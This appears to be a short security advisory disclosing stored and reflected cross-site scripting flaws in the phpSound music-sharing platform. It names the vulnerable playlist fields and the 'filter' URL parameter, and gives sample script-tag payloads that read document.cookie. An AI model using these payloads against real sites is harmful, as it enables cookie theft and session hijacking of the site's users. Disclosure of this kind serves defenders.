phpSound Music Sharing Platform Multiple XSS Vulnerabilities

2014.11.12

Credit: Halil Dalabasmaz

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

===Stored XSS===
Create a Playlist and then you can run any XSS payload on "Title" or "Description" input fields.
 
Sample Payload for Stored XSS: "><script>alert(document.cookie);</script>
 
===
 
===Reflected XSS===
 
The URL parameter is "filter" not filtered.
 
http://phpsound.com/demo/index.php?a=explore&filter=XSS
 
Sample Payload for XSS: </title><script>alert(document.cookie);</script>
 
===

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

phpSound Music Sharing Platform Multiple XSS Vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.